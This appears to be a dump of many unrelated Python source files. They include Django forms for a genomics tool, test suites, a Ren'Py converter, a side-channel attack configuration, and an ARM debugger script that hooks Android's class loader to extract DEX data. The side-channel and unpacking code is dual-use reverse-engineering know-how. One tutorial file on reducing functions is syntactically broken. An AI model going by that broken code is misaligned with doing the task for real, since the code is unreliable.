np.load(DATA_ROOT + 'attack_key.npy') ATTACK_KEY_BYTE = 0 ATTACK_PRECOMPUTED_BYTE_VALUES = np.array( [[bin(x).count("1") for x in row] for row in np.load(DATA_ROOT + f'attack_precomputed_byte{ATTACK_KEY_BYTE}_values.npy')] ) TRACES_PER_ATTACK = 2000 # Maximum number of traces to use per attack NUM_ATTACKS = 100 # Number of attacks to average the GE over
py
1a3f75aa42b53a347e1cf5cc2950a9abd0fddfff
"""Copyright (c) 2018 Great Ormond Street Hospital for Children NHS Foundation Trust & Birmingham Women's and Children's NHS Foundation Trust Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from datetime import datetime from django import forms from django.contrib.auth.models import User from django.forms import HiddenInput, Textarea, CheckboxInput, Select, ModelChoiceField from django.forms import BaseFormSet from .models import * class UserForm(forms.ModelForm): """ User registration form """ password = forms.CharField(widget=forms.PasswordInput()) role_choices = (('Clinician', 'Clinician'), ('Clinical Scientist', 'Clinical Scientist'), ('Other Staff', 'Other Staff')) role = forms.ChoiceField(choices=role_choices) config_dict = load_config.LoadConfig().load() if config_dict['GMC'] != 'None': choices = config_dict['GMC'].split(',') gmc_choices = [] for choice in choices: choice = choice.strip(' ') gmc_choices.append((choice, choice)) hospital = forms.ChoiceField(choices=gmc_choices) else: hospital = forms.CharField() class Meta: model = User fields = ('first_name', 'last_name', 'email', 'password') class ProfileForm(forms.Form): """ Allows users to change their info. TODO - Remove this as could be security risk if 2 permission layers are introduced """ role_choices = (('Clinician', 'Clinician'), ('Clinical Scientist', 'Clinical Scientist'), ('Other Staff', 'Other Staff'), ('Unknown', 'Unknown'),) role = forms.ChoiceField(choices=role_choices, required=False) config_dict = load_config.LoadConfig().load() if config_dict['GMC'] != 'None': choices = config_dict['GMC'].split(',') gmc_choices = [] for choice in choices: choice = choice.strip(' ') gmc_choices.append((choice, choice)) hospital = forms.ChoiceField(choices=gmc_choices) else: hospital = forms.CharField() class ProbandForm(forms.ModelForm): ''' Form used for allowing users edit proband information ''' class Meta: model = Proband fields = ['outcome', 'comment'] widgets = { 'outcome': Textarea(attrs={'rows': '3'}), 'comment': Textarea(attrs={'rows': '3'}), } class VariantValidationForm(forms.ModelForm): """ Form used to change values used for variant validation tracking. """ def __init__(self, *args, **kwargs): super(VariantValidationForm, self).__init__(*args, **kwargs) self.fields['validation_responsible_user'].required=False class Meta: model = ProbandVariant fields = [ 'validation_status', 'validation_responsible_user', ] class AddCommentForm(forms.ModelForm): ''' Adds a new CaseComment in the Proband page ''' class Meta: model = CaseComment fields = ['comment'] class GELIRForm(forms.ModelForm): ''' Form used for allowing users edit proband information ''' class Meta: model = GELInterpretationReport fields = ['case_status', 'mdt_status', 'pilot_case', 'case_sent', 'no_primary_findings', 'case_code'] def save(self): gelir = self.instance data = self.cleaned_data gelir.case_status = data['case_status'] gelir.mdt_status = data['mdt_status'] gelir.pilot_case = data['pilot_case'] gelir.case_sent = data['case_sent'] gelir.no_primary_findings = data['no_primary_findings'] gelir.case_code = data['case_code'] gelir.save(overwrite=True) class RelativeForm(forms.ModelForm): ''' Form used for allowing users edit Relative demographics ''' class Meta: model = Relative fields = ['forename', 'surname', 'date_of_birth', 'nhs_number', 'sex', 'affected_status'] class DemogsForm(forms.ModelForm): ''' Form used for allowing users edit proband demographics ''' class Meta: model = Proband fields = ['nhs_number', 'lab_number', 'forename', 'surname', 'date_of_birth', 'sex', 'local_id', 'gmc'] class PanelForm(forms.Form): ''' Form used for allowing users to add a panel to a proband ''' panel = forms.ModelChoiceField(queryset=PanelVersion.objects.order_by('panel')) class ClinicianForm(forms.Form): ''' Form used for allowing users to change a probands clinician ''' clinician = forms.ModelChoiceField(queryset=Clinician.objects.filter(added_by_user=True).order_by('name')) class AddClinicianForm(forms.ModelForm): ''' Form used in Proband View to allow users add a new Clinician ''' config_dict = load_config.LoadConfig().load() if config_dict['GMC'] != 'None': choices = config_dict['GMC'].split(',') gmc_choices = [] for choice in choices: choice = choice.strip(' ') gmc_choices.append((choice, choice)) hospital = forms.ChoiceField(choices=gmc_choices) else: hospital = forms.CharField() class Meta: model = Clinician fields = ['name', 'hospital', 'email'] class UserChoiceField(ModelChoiceField): def label_from_instance(self, obj): return "%s %s" % (obj.first_name, obj.last_name) class CaseAssignForm(forms.ModelForm): ''' Form for specifying which user a case is assigned to ''' assigned_user = UserChoiceField(queryset=User.objects.all().order_by('first_name')) class Meta: model = GELInterpretationReport fields = ["assigned_user"] def save(self): gelir = self.instance data = self.cleaned_data gelir.assigned_user = data['assigned_user'] gelir.save(overwrite=True) class FirstCheckAssignForm(forms.ModelForm): ''' Form for specifying which user performed the first check ''' first_check = UserChoiceField(queryset=User.objects.all().order_by('first_name')) class Meta: model = GELInterpretationReport fields = ["first_check"] def save(self): gelir = self.instance data = self.cleaned_data gelir.first_check = data['first_check'] gelir.save(overwrite=True) class SecondCheckAssignForm(forms.ModelForm): ''' Form for specifying which user performed the second check ''' second_check = UserChoiceField(queryset=User.objects.all().order_by('first_name')) class Meta: model = GELInterpretationReport fields = ["second_check"] def save(self): gelir = self.instance data = self.cleaned_data gelir.second_check = data['second_check'] gelir.save(overwrite=True) class MdtForm(forms.ModelForm): ''' Form which edits MDT instance specific fields such as date and status ''' class Meta: model = MDT fields = ['description', 'date_of_mdt', 'status', 'sent_to_clinician'] class MdtSentToClinicianForm(forms.ModelForm): ''' Form for recording the whether the MDT list has been sent to the clinician ''' class Meta: model = MDT fields = ['sent_to_clinician'] def __init__(self, *args, **kwargs): super(MdtSentToClinicianForm, self).__init__(*args, **kwargs) self.fields['sent_to_clinician'].required = False class ProbandMDTForm(forms.ModelForm): ''' Form used in Proband View at MDT which allows users to fill in proband textfields ''' class Meta: model = Proband fields = ('discussion', 'action') widgets = { 'discussion': Textarea(attrs={'rows': '3'}), 'action': Textarea(attrs={'rows': '3'}), } class GELIRMDTForm(forms.ModelForm): ''' Form used in Proband View at MDT which allows users to fill in proband textfields ''' class Meta: model = GELInterpretationReport fields = ('case_status',) def __init__(self, *args, **kwargs): super(GELIRMDTForm, self).__init__(*args, **kwargs) self.fields['case_status'].required = False def save(self): gelir = self.instance data = self.cleaned_data gelir.case_status = data['case_status'] gelir.save(overwrite=True) class RareDiseaseMDTForm(forms.ModelForm): ''' Form used in Proband View at MDT which allows users to fill in exit questionaire questions ''' requires_validation = forms.ChoiceField( choices=( ('U', 'Unknown'), ('A', 'Awaiting Validation'), ('K', 'Urgent Validation'), ('I', 'In Progress'), ('P', 'Passed Validation'), ('F', 'Failed Validation'), ('N', 'Not Required'), ) ) class Meta: model = RareDiseaseReport fields = ( 'contribution_to_phenotype', 'change_med', 'clinical_trial', 'requires_validation', 'discussion', 'action', 'inform_reproductive_choice', 'surgical_option', 'add_surveillance_for_relatives', 'classification', 'id',) widgets = { 'id': HiddenInput(), 'surgical_option': CheckboxInput(), 'requires_validation': Select(), 'change_med': CheckboxInput(), 'add_surveillance_for_relatives': CheckboxInput(), 'clinical_trial': CheckboxInput(), 'inform_reproductive_choice': CheckboxInput(), 'discussion': Textarea(attrs={'rows': '4'}), 'action': Textarea(attrs={'rows': '4'}) } def save(self, commit=True): selected_validation_status = self.cleaned_data['requires_validation'] pv = self.instance.proband_variant pv.validation_status = selected_validation_status if not pv.validation_datetime_set: pv.validation_datetime_set = datetime.now() pv.save() return super(RareDiseaseMDTForm, self).save(commit=commit) class CancerMDTForm(forms.ModelForm): ''' Form used in Proband View at MDT which allows users to fill in exit questionaire questions ''' requires_validation = forms.ChoiceField( choices=( ('U', 'Unknown'), ('A', 'Awaiting Validation'), ('K', 'Urgent Validation'), ('I', 'In Progress'), ('P', 'Passed Validation'), ('F', 'Failed Validation'), ('N', 'Not Required'), ) ) class Meta: model = CancerReport fields = ('variant_use', 'action_type', 'validated', 'validated_assay_type', 'classification', 'id',) widgets = {'id': HiddenInput(), 'validated': CheckboxInput(), } def save(self, commit=True): selected_validation_status = self.cleaned_data['requires_validation'] pv = self.instance.proband_variant pv.validation_status = selected_validation_status if not pv.validation_datetime_set: pv.validation_datetime_set = datetime.now() pv.save() return super(CancerMDTForm, self).save(commit=commit) class AddNewAttendee(forms.Form): ''' Form for allowing users to add new attendee which would then be inserted into CS, Clinician or OtherStaff table ''' name = forms.CharField() config_dict = load_config.LoadConfig().load() if config_dict['GMC'] != 'None': choices = config_dict['GMC'].split(',') gmc_choices = [] for choice in choices: choice = choice.strip(' ') gmc_choices.append((choice, choice)) hospital = forms.ChoiceField(choices=gmc_choices) else: hospital = forms.CharField() email = forms.EmailField() role = forms.ChoiceField(choices=(('Clinician', 'Clinician'), ('Clinical Scientist', 'Clinical Scientist'), ('Other Staff', 'Other Staff'))) class AddVariantForm(forms.ModelForm): ''' Allows users to add a variant to a report. Users have to enter chromosome, position, reference, alternate, dbsnp TODO should check everything users enters for consistancy ''' def clean_reference(self): data = self.cleaned_data['reference'].strip() if not all([f in ['A', 'T', 'G', 'C'] for f in data]): raise forms.ValidationError("Not DNA sequence") else: return data def clean_alternate(self): data = self.cleaned_data['alternate'].strip() if not all([f in ['A', 'T', 'G', 'C'] for f in data]): raise forms.ValidationError("Not DNA sequence") else: return data class Meta: model = Variant fields = ['chromosome', 'position', 'reference', 'alternate', 'db_snp_id'] widgets = {'reference': Textarea(attrs={'rows': '2'}), 'alternate': Textarea(attrs={'rows': '2'})} class GenomicsEnglandform(forms.Form): """ Form for entering genomics england information to render a report to be used by the scientists """ interpretation_id = forms.IntegerField(label='Interpretation ID') # Version number of the interpretation ir_version = forms.IntegerField(label='Version') report_version = forms.IntegerField(label='Clinical Report Version') class GeneSearchForm(forms.Form): gene = forms.CharField(max_length=25, widget = forms.TextInput(attrs={'style': 'width:200px'})) class AddCaseAlert(forms.ModelForm): def clean_gel_id(self): if self.cleaned_data['gel_id'].isdigit() and len(self.cleaned_data['gel_id']) >= 8: return self.cleaned_data['gel_id'].strip() else: forms.ValidationError("Doesn't look like a GELID") class Meta: model = CaseAlert fields = ['gel_id', 'comment', 'sample_type']
py
1a3f75cb101ec6ef6fd9b41a170a98b7797fecf6
import argparse import json from ArticyCoreClass import ArticyCore from ArticyCoreClass import Character from ArticyCoreClass import FlowFrag from ArticyCoreClass import Episode from ArticyCoreClass import Scene from ArticyCoreClass import Dialog from ArticyCoreClass import Condition from ArticyCoreClass import Instruction from ArticyCoreClass import Snippet from ArticyCoreClass import Code from ArticyCoreClass import Game from ArticyCoreClass import Hub parser = argparse.ArgumentParser(description='Convert the JSON file from Articy to a Renpy file') parser.add_argument('-i', required=True, help='JSON file created by Articy (required)') parser.add_argument('-o', required=False, help='Renpy file created from the JSON file') args = parser.parse_args() #print(args) #print(args.i) #------------------------------------------------------------------------------- f = open(args.i) data = json.load(f) f.close() TheGame: Game = None Characters = [] FlowFrags = [] Episodes = [] Scenes = [] Dialogs = [] Conditions = [] Snippets = [] Codes = [] Instructions = [] Hubs = [] #------------------------------------------------------------------------------- # parse the JSON file, building up internal data structures for package in data['Packages']: for model in package['Models']: if model['Type']=='DialogueFragment': properties = model['Properties'] outputpins = properties['OutputPins'] outputs = [] for outputpin in outputpins: connections = outputpin['Connections'] for connection in connections: outputs.append(connection['Target']) dialog = Dialog(properties['Id'], properties['Parent'], properties['MenuText'], properties['StageDirections'], properties['Speaker'], properties['Text'], outputs) Dialogs.append(dialog) elif model['Type']=='Instruction': properties = model['Properties'] outputpins = properties['OutputPins'] outputs = [] for outputpin in outputpins: connections = outputpin['Connections'] for connection in connections: outputs.append(connection['Target']) frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs) instruction = Instruction(frag, properties['Expression']) Instructions.append(instruction) elif model['Type']=='Condition': properties = model['Properties'] outputpins = properties['OutputPins'] outputs = [] for outputpin in outputpins: connections = outputpin['Connections'] for connection in connections: outputs.append(connection['Target']) frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs) condition = Condition(frag, properties['Expression']) Conditions.append(condition) elif model['Type']=='Hub': properties = model['Properties'] outputpins = properties['OutputPins'] outputs = [] for outputpin in outputpins: connections = outputpin['Connections'] for connection in connections: outputs.append(connection['Target']) frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs) hub = Hub(frag, "hub") Hubs.append(hub) elif model['Type']=='DefaultMainCharacterTemplate_02': properties = model['Properties'] color = properties['Color'] template = model['Template'] basic = template['DefaultBasicCharacterFeature_02'] colorR = round(255*color['r']) colorG = round(255*color['g']) colorB = round(255*color['b']) char = Character(properties['Id'], properties['DisplayName'], (colorR, colorG, colorB), basic['AbreviatedName']) Characters.append(char) elif (model['Type']=='FlowFragment') or (model['Type']=='Dialogue'): properties = model['Properties'] outputpins = properties['OutputPins'] outputs = [] for outputpin in outputpins: if 'Connections' in outputpin: connections = outputpin['Connections'] for connection in connections: outputs.append(connection['Target']) frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs) FlowFrags.append(frag) names = frag.Name.split() if names[0].lower()[:7] == 'episode': episode = Episode(frag) Episodes.append(episode) elif names[0].lower()[:5] == 'scene': scene = Scene(frag) Scenes.append(scene) elif names[0].lower()[:7] == 'snippet': scene = Snippet(frag) Snippets.append(scene) elif names[0].lower()[:4] == 'code': scene = Code(frag) Codes.append(scene) elif names[0].lower()[:4] == 'game': TheGame = Game(frag) else: print('Unhandled ???') print(model['Type']) print() #------------------------------------------------------------------------------- # For debug purposes, print out the data structures created from parsing the JSON file print('Characters:') Characters.sort(key=lambda character: character.Name) for char in Characters: print(char) print() print('FlowFrags:') for frag in FlowFrags: print(frag) print() print('Game:') print(TheGame) print() print('Episodes:') Episodes.sort(key=lambda episode: episode.Num) for episode in Episodes: print(episode) print() print('Scenes:') Scenes.sort(key=lambda scene: scene.Num) for scene in Scenes: print(scene) print() print('Snippets:') Snippets.sort(key=lambda snippet: snippet.Num) for snippet in Snippets: print(snippet) print() print('Dialogs:') for dialog in Dialogs: # if dialog.StageDirections == 'aurora smirks': if dialog.StageDirections == 'art sad': debug = 1 dialog.MakeConnections(Scenes, Characters, Dialogs, Conditions, Instructions, Codes, Snippets, Hubs) for dialog in Dialogs: print(dialog) print() def Connections(name, clist: []): print(name+":") for citem in clist: citem.MakeConnections(Scenes, Dialogs, Conditions, Instructions, Codes, Snippets, Hubs) print(citem) print() Connections('Conditions', Conditions) Connections('Instructions', Instructions) Connections('Code Blocks', Codes) Connections('Snippets', Snippets) Connections('Hubs', Hubs) #------------------------------------------------------------------------------- # Now translate the structures into a Ren'Py representation TheGame.MakeLinkages(Episodes) print(TheGame.Title()) episode = TheGame.First while episode != None: print(' ', episode.Title()) episode.MakeLinkages(Scenes) scene = episode.First while scene != None: print(' ', f"({scene.Prefix()})", scene.Title()) scene = scene.Next() print() episode = episode.Next() print() for scene in Scenes: scene.PrepareDialog(Dialogs, Snippets, Conditions, Instructions, Codes) lines = scene.CreateRenpyScene() if len(lines) > 0: print(f"({scene.Prefix()}) {scene.Title()}") print() for line in lines: print(line) print() for snippet in Snippets: snippet.PrepareDialog(Dialogs, Snippets, Conditions, Instructions, Codes) lines = snippet.CreateRenpyScene() if len(lines) > 0: print(f"({snippet.Prefix()}) {snippet.Title()}") print() for line in lines: print(line) print() for scene in Scenes: if len(scene.Images) > 0: print(f"({scene.Prefix()}) {scene.Title()}") for imagename in scene.Images: print(imagename) print() for snippet in Snippets: if len(snippet.Images) > 0: print(f"({snippet.Prefix()}) {snippet.Title()}") for imagename in snippet.Images: print(imagename) print() print() #------------------------------------------------------------------------------- # write Rnpy code out to the specified file if args.o != None: f = open(args.o, "w") # The code files for scene in Scenes: lines = scene.CreateRenpyScene() if len(lines) > 0: for line in lines: f.write(f"{line}\n") f.write("\n") for snippet in Snippets: lines = snippet.CreateRenpyScene() if len(lines) > 0: for line in lines: f.write(f"{line}\n") f.write("\n") # List out the images needed for scene in Scenes: if len(scene.Images) > 0: for imagename in scene.Images: f.write(f"{imagename}\n") f.write("\n") for snippet in Snippets: if len(snippet.Images) > 0: for imagename in snippet.Images: f.write(f"{imagename}\n") f.write("\n") f.close()
py
1a3f75cbe34eb718ca742b3fb41404b1619b3fb8
import os os.system("uvicorn main:app --reload")
py
1a3f761b317fe13b8b320a698c7570416e42362d
from typing import Optional from numbers import Number import numpy as np import pandas as pd import plotly.express as px import plotly.graph_objects as go __all__ = [ 'plot', ] def plot( df: pd.DataFrame, *args, zmin: Optional[Number] = None, zmax: Optional[Number] = None, **kwargs, ) -> go.Figure: if zmin is None: zmin = -1 if zmax is None: zmax = 1 return px.imshow(get_lower_correlation_matrix(df), *args, zmin=zmin, zmax=zmax, **kwargs) def get_lower_correlation_matrix(df: pd.DataFrame) -> pd.DataFrame: correlation = df.corr() return correlation.where(np.tril(np.ones(correlation.shape), k=-1).astype(bool))
py
1a3f76c1cb52a245350c7d57afe6d31e12a97086
import pytest from sqlalchemy.exc import IntegrityError from blitzdb import Document from blitzdb.fields import CharField, ForeignKeyField, ManyToManyField from ..conftest import _sql_backend, get_sql_engine class DirectorAward(Document): class Meta(Document.Meta): autoregister = False name = CharField(indexed=True) director = ForeignKeyField('Director', backref='awards') class Actor(Document): class Meta(Document.Meta): autoregister = False name = CharField(indexed=True) class Movie(Document): class Meta(Document.Meta): autoregister = False director = ForeignKeyField('Director', backref='movies') actors = ManyToManyField('Actor', backref='movies') name = CharField(indexed=True) class Director(Document): class Meta(Document.Meta): autoregister = False name = CharField(indexed=True) def _init_backend(backend): backend.register(Actor) backend.register(Movie) backend.register(Director) backend.register(DirectorAward) backend.init_schema() backend.create_schema() ted_kotcheff = Director({'name': 'Ted Kotcheff'}) silvester_stallone = Actor({'name': 'Silvester Stallone'}) rambo = Movie({'name': 'Rambo I', 'actors': [silvester_stallone], 'director': ted_kotcheff}) oscar = DirectorAward({'name': 'Oscar', 'director': ted_kotcheff}) with backend.transaction(): backend.save(rambo) backend.save(oscar) @pytest.fixture def cascade_backend(request): engine = get_sql_engine() backend = _sql_backend(request, engine, autodiscover_classes=False, ondelete='CASCADE') _init_backend(backend) return backend @pytest.fixture def nocascade_backend(request): engine = get_sql_engine() backend = _sql_backend(request, engine, autodiscover_classes=False, ondelete=None) _init_backend(backend) return backend def test_foreign_key_delete_cascade(cascade_backend): movie = cascade_backend.get(Movie, {}) director = cascade_backend.get(Director, {}) director.delete() assert cascade_backend.filter(Actor, {}) assert not cascade_backend.filter(Director, {}) assert not cascade_backend.filter(Movie, {}) assert not cascade_backend.filter(DirectorAward, {}) def test_foreign_key_delete_nocascade(nocascade_backend): movie = nocascade_backend.get(Movie, {}) actor = nocascade_backend.get(Actor, {}) director = nocascade_backend.get(Director, {}) with pytest.raises(IntegrityError): director.delete() assert actor in nocascade_backend.filter(Actor, {}) assert director in nocascade_backend.filter(Director, {}) assert movie in nocascade_backend.filter(Movie, {}) def test_many_to_many_delete_cascade(cascade_backend): movie = cascade_backend.get(Movie, {}) actor = cascade_backend.get(Actor, {}) actor.delete() assert not cascade_backend.filter(Actor, {}) assert cascade_backend.filter(Movie, {}) def test_many_to_many_delete_nocascade(nocascade_backend): movie = nocascade_backend.get(Movie, {}) actor = nocascade_backend.get(Actor, {}) director = nocascade_backend.get(Director, {}) with pytest.raises(IntegrityError): actor.delete() assert actor in nocascade_backend.filter(Actor, {}) assert director in nocascade_backend.filter(Director, {}) assert movie in nocascade_backend.filter(Movie, {})
py
1a3f76e9b233c61012ace9933073b81a881836c7
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-11-27 13:46 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('acp_calendar', '0002_load_holiday_type'), ] operations = [ migrations.AddField( model_name='acpholiday', name='fiscal_year', field=models.IntegerField(default=0, verbose_name='fiscal year'), ), ]
py
1a3f76edc4f66b98ae0b6c9ecd90a1a1f2306947
"""Reducing Functions in Python These are functions that recombine an iterable recursively, ending up with a single return value Also called accumulators, aggregators, or folding functions Example: Finding the maximum value in an iterable a0, a1, a2, ...,, aN-1 max(a, b) _> maximum of a and b result =a0 result = max(result, a1) result = max(result, a2) ... result = max(result, an-1) # max value in a0, a1, a2, ..., an-1 the special case of sequences (i.e. we can use indexes to access elements in the sequence) Using a loop """ l = l[5, 8, 6, 10, 9] # result = 5 max_value = lambda a, b: a if a > b else b # result = max(5, 8) = 8 def max_sequence(sequence): # result = max(5, 6) = 8 result = sequence[0] for e in sequence[1:]: # result = max(5, 10) = 10 result = max_value(result, e) # result = max(5, 10) = 10 return result # result -> 10 Notice the sequence of steps: l = [5, 8, 6, 10, 9] ^ | | | | | 5 | | \ | | max(5, 8) | 8 \ \ max(8, 6)
py
1a3f77014d6512537fcb6347d3b30ebbac1bbfbd
from django.db import models from django.utils.text import gettext_lazy as _ from django.urls import reverse class BaseModel(models.Model): created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) class Meta: abstract = True
py
1a3f771c0ea151e6138fef721a2dd113170c544e
#!/usr/bin/env python import socket import sys import rospy from geometry_msgs.msg import Pose2D # Create a TCP/IP socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Bind the socket to the port server_address = ('10.103.118.91', 8000) print >>sys.stderr, 'starting up on %s port %s' % server_address sock.bind(server_address) # Listen for incoming connections sock.listen(1) pub = rospy.Publisher('/nav_goal', Pose2D, queue_size=10) rospy.init_node('goal_publisher', anonymous=True) rate = rospy.Rate(100) # 10hz """ starting up on 10.103.118.91 port 8000 waiting for a connection connection from ('10.103.95.125', 43562) received "{ "skill_name" : "Go_to","location": "water"}" sending data back to the client received "" no more data from ('10.103.95.125', 43562) waiting for a connection """ named_locations = {"door" : [-1, -1, 0], "water": [-2, -7, 0], "middle": [-1.5, -3, 0]} def get_position_from_name(name): try: return named_locations[name.strip().lower()] except: return None while True: # Wait for a connection print >>sys.stderr, 'waiting for a connection' connection, client_address = sock.accept() try: print >>sys.stderr, 'connection from', client_address # Receive the data in small chunks and retransmit it while True: data = connection.recv(4000) if data: name = data.split('"location": ')[1].replace("}", "").replace('"', '').strip() print(name) pos = get_position_from_name(name) if pos is not None: for _ in range(10): pub.publish(*pos) else: print >>sys.stderr, 'no more data from', client_address break finally: # Clean up the connection connection.close()
py
1a3f775fcf3d94441ee73b8d80b556eae0ea6dd6
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2012 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import random from tempest.api.object_storage import base from tempest.common.utils.data_utils import rand_name from tempest import exceptions from tempest.test import attr from tempest.test import HTTP_SUCCESS class AccountTest(base.BaseObjectTest): @classmethod def setUpClass(cls): super(AccountTest, cls).setUpClass() cls.containers = [] for i in xrange(ord('a'), ord('f') + 1): name = rand_name(name='%s-' % chr(i)) cls.container_client.create_container(name) cls.containers.append(name) cls.containers_count = len(cls.containers) @classmethod def tearDownClass(cls): cls.delete_containers(cls.containers) super(AccountTest, cls).tearDownClass() @attr(type='smoke') def test_list_containers(self): # list of all containers should not be empty params = {'format': 'json'} resp, container_list = \ self.account_client.list_account_containers(params=params) self.assertIsNotNone(container_list) container_names = [c['name'] for c in container_list] for container_name in self.containers: self.assertIn(container_name, container_names) @attr(type='smoke') def test_list_containers_with_limit(self): # list containers one of them, half of them then all of them for limit in (1, self.containers_count / 2, self.containers_count): params = {'limit': limit} resp, container_list = \ self.account_client.list_account_containers(params=params) self.assertEqual(len(container_list), limit) @attr(type='smoke') def test_list_containers_with_marker(self): # list containers using marker param # first expect to get 0 container as we specified last # the container as marker # second expect to get the bottom half of the containers params = {'marker': self.containers[-1]} resp, container_list = \ self.account_client.list_account_containers(params=params) self.assertEqual(len(container_list), 0) params = {'marker': self.containers[self.containers_count / 2]} resp, container_list = \ self.account_client.list_account_containers(params=params) self.assertEqual(len(container_list), self.containers_count / 2 - 1) @attr(type='smoke') def test_list_containers_with_end_marker(self): # list containers using end_marker param # first expect to get 0 container as we specified first container as # end_marker # second expect to get the top half of the containers params = {'end_marker': self.containers[0]} resp, container_list = \ self.account_client.list_account_containers(params=params) self.assertEqual(len(container_list), 0) params = {'end_marker': self.containers[self.containers_count / 2]} resp, container_list = \ self.account_client.list_account_containers(params=params) self.assertEqual(len(container_list), self.containers_count / 2) @attr(type='smoke') def test_list_containers_with_limit_and_marker(self): # list containers combining marker and limit param # result are always limitated by the limit whatever the marker for marker in random.choice(self.containers): limit = random.randint(0, self.containers_count - 1) params = {'marker': marker, 'limit': limit} resp, container_list = \ self.account_client.list_account_containers(params=params) self.assertLessEqual(len(container_list), limit) @attr(type='smoke') def test_list_account_metadata(self): # list all account metadata resp, metadata = self.account_client.list_account_metadata() self.assertIn(int(resp['status']), HTTP_SUCCESS) self.assertIn('x-account-object-count', resp) self.assertIn('x-account-container-count', resp) self.assertIn('x-account-bytes-used', resp) @attr(type='smoke') def test_create_and_delete_account_metadata(self): header = 'test-account-meta' data = 'Meta!' # add metadata to account resp, _ = self.account_client.create_account_metadata( metadata={header: data}) self.assertIn(int(resp['status']), HTTP_SUCCESS) resp, _ = self.account_client.list_account_metadata() self.assertIn('x-account-meta-' + header, resp) self.assertEqual(resp['x-account-meta-' + header], data) # delete metadata from account resp, _ = \ self.account_client.delete_account_metadata(metadata=[header]) self.assertIn(int(resp['status']), HTTP_SUCCESS) resp, _ = self.account_client.list_account_metadata() self.assertNotIn('x-account-meta-' + header, resp) @attr(type=['negative', 'gate']) def test_list_containers_with_non_authorized_user(self): # list containers using non-authorized user # create user self.data.setup_test_user() resp, body = \ self.token_client.auth(self.data.test_user, self.data.test_password, self.data.test_tenant) new_token = \ self.token_client.get_token(self.data.test_user, self.data.test_password, self.data.test_tenant) custom_headers = {'X-Auth-Token': new_token} params = {'format': 'json'} # list containers with non-authorized user token self.assertRaises(exceptions.Unauthorized, self.custom_account_client.list_account_containers, params=params, metadata=custom_headers) # delete the user which was created self.data.teardown_all()
py
1a3f777399f5f9e1c756b1f294a7641eb0d0a184
# Copyright 2015 Google Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest2 class TestConnection(unittest2.TestCase): def _getTargetClass(self): from gcloud.dns.connection import Connection return Connection def _makeOne(self, *args, **kw): return self._getTargetClass()(*args, **kw) def test_build_api_url_no_extra_query_params(self): conn = self._makeOne() URI = '/'.join([ conn.API_BASE_URL, 'dns', conn.API_VERSION, 'foo', ]) self.assertEqual(conn.build_api_url('/foo'), URI) def test_build_api_url_w_extra_query_params(self): from six.moves.urllib.parse import parse_qsl from six.moves.urllib.parse import urlsplit conn = self._makeOne() uri = conn.build_api_url('/foo', {'bar': 'baz'}) scheme, netloc, path, qs, _ = urlsplit(uri) self.assertEqual('%s://%s' % (scheme, netloc), conn.API_BASE_URL) self.assertEqual(path, '/'.join(['', 'dns', conn.API_VERSION, 'foo'])) parms = dict(parse_qsl(qs)) self.assertEqual(parms['bar'], 'baz')
py
1a3f78dbf1d8e0ee74ecd5c694f9651951f2ed27
# LoadClass_arm.py is used to .... when the "ClassLinker::LoadClassMembers" method is invoked in 32-bit mode. import gc import os import sys from arm_ds.debugger_v1 import Debugger from arm_ds.debugger_v1 import DebugException import config import memory import mmu from DexParser import header_item, string_id_item, type_id_item, class_def_item # obtain current execution state debugger = Debugger() execution_state = debugger.getCurrentExecutionContext() def retrieve_string_value(string_ptr): length_val = memory.readMemory32(string_ptr + config.offset_string_length) reference_ptr = memory.readMemory32(string_ptr + config.offset_string_reference) char_array = memory.retrieve_char_array(reference_ptr) return char_array def start_prolog(): # disable the FindClass breakpoint for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()): brk_object = execution_state.getBreakpointService().getBreakpoint(idx) if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass: brk_object.disable() def end_prolog_done(): # disable the FindClass breakpoint for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()): brk_object = execution_state.getBreakpointService().getBreakpoint(idx) if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass: brk_object.disable() # disable the LoadMethod breakpoint for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()): brk_object = execution_state.getBreakpointService().getBreakpoint(idx) if 